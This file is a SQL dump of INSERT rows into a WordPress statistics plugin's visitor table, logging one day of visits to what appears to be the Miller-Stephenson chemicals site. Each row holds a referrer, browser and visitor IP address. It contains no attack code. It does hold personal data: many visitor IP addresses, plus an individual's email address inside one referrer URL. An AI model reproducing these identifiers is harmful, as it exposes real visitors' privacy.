INSERT INTO `wp_statistics_visitor` VALUES (5516, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.243.166.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5517, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '113.92.230.240', '000', 27, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5518, '2016-10-18', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '14.139.55.146', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5519, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.186.200.56', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5520, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5521, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5522, '2016-10-18', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '107.184.158.99', '000', 33, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5523, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.29.11.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5524, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.36.132.84', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5525, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.42.59.189', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5526, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.195.183.248', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5527, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.201.237.253', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5528, '2016-10-18', 'https://www.google.co.jp/', 'Chrome', 'Windows', '53.0.2785.143', '', '203.180.29.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5529, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.90.248.24', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5530, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.116', '', '134.249.159.113', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5531, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.88.17.192', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5532, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.168.81.7', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5533, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCAQFjAG&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fvazo_overview.html&ei=dLYFWKbbNLKhmQSgVg&usg=AFQjCNESI5yDu11sJVIRdHyRBsQiHWCyHw', 'MSIE', 'Windows', '11.0', '', '66.102.6.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5534, '2016-10-18', 'https://www.miller-stephenson.com/chemicals/vazo-radical-initiators/', 'MSIE', 'Windows', '11.0', '', '66.102.6.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5535, '2016-10-18', 'https://www.miller-stephenson.com', 'DF', 'Unknown', 'Unknown', '', '54.183.70.139', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5536, '2016-10-18', 'https://search.yahoo.co.jp/search;_ylt=A7dPenjouQVYqVkAJrSJBtF7?p=MS-122DF+SDS&search.x=1&fr=top_ga1_sa&tid=top_ga1_sa&ei=UTF-8&aq=&oq=&afs=', 'MSIE', 'Windows', '11.0', '', '61.127.172.193', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5537, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.29.103.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5538, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.155.192.84', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5539, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.255.202.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5540, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.124.152.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5541, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.192.168.150', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5542, '2016-10-18', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '5.1', '', '46.229.173.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5543, '2016-10-18', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '46.229.173.131', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5544, '2016-10-18', 'https://www.yellowpages.com/berlin-ct/surgical-instruments?page=3', 'Chrome', 'Windows', '54.0.2840.59', '', '182.180.145.77', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5545, '2016-10-18', 'https://processing.hotims.com/r5/search.asp?action=search-eresp&return_by_category=y&switch_issue_id=60409&mc=Processing_October2016&email=yeping.cai@sud-chemie.com&eresponse=1', 'Chrome', 'Windows', '49.0.2623.112', '', '115.112.106.164', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5546, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.52.221.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5547, '2016-10-18', '(null)', 'Firefox', 'Windows', '33.0', '', '162.243.5.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5548, '2016-10-18', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '36.0.1985.125', '', '101.199.112.53', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5549, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.34.23.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5550, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.249.129.204', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5551, '2016-10-18', 'https://ru-dety.ru/', 'Unknown', 'Unknown', 'Unknown', '', '46.118.118.216', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5552, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '91.221.59.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5553, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '175.136.244.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5554, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.186.76.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5555, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '35.160.55.171', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5556, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.132.236.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5557, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '113.118.247.236', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5558, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '113.118.244.223', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5559, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.249.180.197', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5560, '2016-10-18', 'https://www.google.com.sg/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwiDhcGM5ePPAhVMO48KHZ89DkUQFggaMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw&bvm=bv.135974163,d.c2I', 'MSIE', 'Windows', '11.0', '', '160.96.214.142', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5561, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.163.9.178', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5562, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5563, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.122.19.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5564, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.79.169.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5565, '2016-10-18', 'https://www.google.se/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwi-oeql6uPPAhXGBBoKHd8FDMkQFggpMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmold-release-agents%2F&usg=AFQjCNHiUQOR877JKNoWUmUHNwPWntGGuw&sig2=2RAFSKxL1GscD6haqnmBxA', 'MSIE', 'Windows', '11.0', '', '195.58.97.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5566, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.240.156.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5567, '2016-10-18', 'https://translate.googleusercontent.com/translate_p?hl=ru&prev=search&sl=en&u=https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/ptfe-dryfilm-lubricants/&depth=1&rurl=translate.google.ru&usg=ALkJrhgAAAAAWAXSkUiPlvXp6jZqpdH_ui32DiheueTY', 'Chrome', 'Windows', '53.0.2785.143', '', '62.117.96.12', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5568, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.221.202.126', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5569, '2016-10-18', 'https://mmr.mschem.com/miller/pdf/132FE,153FE.pdf', 'Chrome', 'Windows', '49.0.2623.112', '', '175.138.7.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5570, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '76.169.41.59', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5571, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '212.175.18.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5572, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.162.67.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5573, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '30.0.1599.69', '', '121.189.37.113', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5574, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '88.147.243.143', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5575, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.44.130.127', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5576, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '28.0.1500.95', '', '54.235.238.237', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5577, '2016-10-18', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwi_-4aR8uPPAhXHJsAKHWyDDJgQFgg6MAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-205%2F&usg=AFQjCNHwZ2VkQ2EkLZn-9yjL6I2BINcdgA&sig2=q7PySn1UwSciyMOlx1zmeQ', 'MSIE', 'Windows', '11.0', '', '132.3.21.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5578, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.239.140.149', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5579, '2016-10-18', 'https://www.google.de/', 'Firefox', 'Windows', '49.0', '', '134.94.80.145', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5580, '2016-10-18', 'https://www.google.pl/', 'Chrome', 'Windows', '49.0.2623.112', '', '172.17.0.200', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5581, '2016-10-18', 'https://www.google.co.za/', 'Chrome', 'Windows', '47.0.2526.73', '', '41.57.145.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5582, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.219.48.39', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5583, '2016-10-18', 'https://search.yahoo.co.jp/search?p=CHEMSOL+MILLER+STEPHENSON&aq=-1&oq=&ei=UTF-8&fr=top_ga1_sa&x=wrt', 'MSIE', 'Windows', '11.0', '', '125.199.230.214', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5584, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.90.227.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5585, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.208.100.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5586, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.87.120.181', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5587, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.87.146.55', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5588, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.109.51.80', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5589, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.170.84.152', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5590, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.70.188.75', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5591, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '173.208.177.59', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5592, '2016-10-18', 'https://www.domain2008.com/', 'MSIE', 'Windows', '9.0', '', '192.157.231.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5593, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.200.204.150', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5594, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.234.246.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5595, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.181.190.75', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5596, '2016-10-18', 'https://www.google.co.in/', 'Chrome', 'Windows', '54.0.2840.59', '', '1.39.24.221', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5597, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.117.134.222', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5598, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5599, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.142.194.203', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5600, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.167.25.202', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5601, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.187.133.56', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5602, '2016-10-18', 'https://uwestech.com.sg/index.php?route=product/product&product_id=53', 'MSIE', 'Windows', '11.0', '', '10.195.146.194', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5603, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '193.54.90.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5604, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.104.59.162', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5605, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.107.8.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5606, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.252.82.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5607, '2016-10-18', 'https://translate.googleusercontent.com/translate_p?hl=pt-BR&prev=search&sl=en&u=https://www.miller-stephenson.com/product/vazo-64-radical-initiator/&depth=1&rurl=translate.google.com.br&usg=ALkJrhgAAAAAWAXt72iNlum4VWeFMBpBd8d2SBsBjcXg', 'Chrome', 'Windows', '53.0.2785.143', '', '189.109.142.170', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5608, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.208.141.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5609, '2016-10-18', 'https://www.google.it/', 'Chrome', 'Windows', '53.0.2785.143', '', '2.35.157.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5610, '2016-10-18', 'https://www.google.co.uk/', 'Edge', 'Windows', '13.10586', '', '93.97.45.184', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5611, '2016-10-18', 'https://sg.search.yahoo.com/', 'Chrome', 'Windows', '45.0.2454.101', '', '113.118.113.235', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5612, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '183.14.18.56', '000', 51, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5613, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.158.235.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5614, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.41.204.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5615, '2016-10-18', 'https://sg.search.yahoo.com/', 'Chrome', 'Windows', '45.0.2454.101', '', '180.153.214.197', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5616, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '180.153.206.24', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5617, '2016-10-18', 'https://www.google.co.in/', 'Chrome', 'Windows', '54.0.2840.59', '', '59.181.113.71', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5618, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.173.85.139', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5619, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.254.138.163', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5620, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.214.223.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5621, '2016-10-18', 'https://www.google.com.sg/', 'Chrome', 'Windows', '53.0.2785.143', '', '118.200.135.12', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5622, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.106.74.238', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5623, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.66.201.163', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5624, '2016-10-18', 'https://www.google.nl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwie97LViuTPAhVCvBoKHZllBysQFghCMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-105%2F&usg=AFQjCNE7fDUZYvw1vi_-WJ_5lLxrv9GE4g', 'MSIE', 'Windows', '11.0', '', '212.178.113.34', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5625, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.172.8.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5626, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5627, '2016-10-18', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5628, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.144.163.187', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5629, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.68.68.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5630, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.175.35.206', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5631, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.162.39.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5632, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '112.220.72.242', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5633, '2016-10-18', 'https://www.miller-stephenson.com/product/epon-8280/', 'Firefox', 'Windows', '45.0', '', '134.94.80.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5634, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.157.144.49', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5635, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.64.208.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5636, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwil2ZOLlOTPAhXHGD4KHfk9CBsQFggxMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-460h%2F&usg=AFQjCNH-TojjELg6AWRSauYZLd_fucno0A&bvm=bv.135974163,d.cWw', 'MSIE', 'Windows', '11.0', '', '50.234.119.158', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5637, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.146.214.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5638, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.12.33.106', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5639, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.88.59.252', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5640, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.28.172.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5641, '2016-10-18', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '84.255.193.12', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5642, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.78.157.40', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5643, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.170.201.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5644, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.78.233.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5645, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.23.190.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5646, '2016-10-18', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '91.98.108.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5647, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.222.211.157', '000', 40, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5648, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '38.102.226.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5649, '2016-10-18', 'https://www.google.com/', 'Firefox', 'Windows', '24.0', '', '192.162.101.80', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5650, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '192.168.10.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5651, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 124, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5652, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '203.196.19.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5653, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '125.161.151.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5654, '2016-10-18', 'https://www.miller-stephenson.com/', 'Safari', 'iPhone', '7.0', '', '199.30.25.85', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5655, '2016-10-18', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '84.241.29.246', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5656, '2016-10-18', 'https://www.google.de/', 'Safari', 'iPhone', '10.0', '', '80.187.108.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5657, '2016-10-18', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-teflon-lubricants/tribosys-lubricants/connector-lubricants/', 'Safari', 'iPhone', '7.0', '', '157.55.2.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5658, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.143.255.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5659, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.117.168.50', '000', 2, 0); 
